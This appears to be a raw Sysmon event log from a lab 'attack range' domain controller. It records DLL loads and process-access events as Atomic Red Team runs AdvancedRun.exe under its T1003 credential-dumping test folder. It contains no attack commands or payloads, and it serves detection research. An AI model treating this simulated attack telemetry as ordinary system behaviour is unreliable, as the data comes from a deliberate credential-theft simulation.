734700x80000000000000003942488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003942454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-1F03-000000002702}21201092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003942448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.948{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you 